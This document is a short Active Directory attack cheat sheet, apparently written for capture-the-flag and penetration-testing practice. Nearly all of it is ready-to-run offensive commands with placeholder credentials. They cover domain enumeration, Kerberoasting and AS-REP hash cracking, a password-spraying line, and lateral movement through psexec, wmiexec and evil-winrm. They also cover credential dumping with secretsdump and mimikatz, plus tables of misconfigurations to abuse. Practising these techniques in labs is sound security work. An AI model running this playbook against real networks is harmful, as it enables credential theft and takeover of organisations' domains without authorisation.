crackmapexec smb dc -u user -p pass netexec smb dc -u user -p pass --shares rpcclient -U 'user%pass' dc smbclient -L //dc -U user ldapsearch -x -H ldap://dc -D 'user@dom.local' -w pass -b 'DC=dom,DC=local'
| Target | Why |
|---|---|
| valid creds | domain user often enough to start |
| SMB shares | scripts, backups, passwords |
| LDAP info | users, groups, SPNs, descriptions |
| WinRM/RDP | direct shell path |
| bloodhound data | graph attack paths |
GetUserSPNs.py dom.local/user:pass -dc-ip dc -request GetNPUsers.py dom.local/ -usersfile users.txt -dc-ip dc -no-pass hashcat -m 13100 kerb.txt wordlist hashcat -m 18200 asrep.txt wordlist
bloodhound-python -u user -p pass -d dom.local -c All -ns dc # then inspect: - GenericAll / GenericWrite - ForceChangePassword - AddMember - RBCD / delegation - DCSync rights
netexec smb targets.txt -u users.txt -p 'Winter2024!' --continue-on-success # keep attempts low; respect lockout in real envs
evil-winrm -i host -u user -p pass psexec.py dom.local/user:pass@host wmiexec.py dom.local/user:pass@host smbexec.py dom.local/user:pass@host
secretsdump.py dom.local/user:pass@dc klist Rubeus triage mimikatz 'sekurlsa::logonpasswords' # common CTF goal: get admin hash or flag from DC/share
| Misconfig | Abuse |
|---|---|
| description fields | passwords or hints |
| SYSVOL / NETLOGON | scripts with creds |
| delegation / RBCD | machine account abuse |
| WriteOwner / WriteDacl | take over object |
| backup operators / print operators | privileged paths |
- forgetting the domain format user@domain or DOMAIN\user - not syncing time for Kerberos - assuming SMB only; try WinRM / LDAP / RPC too - ignoring machine accounts and gMSA-related leads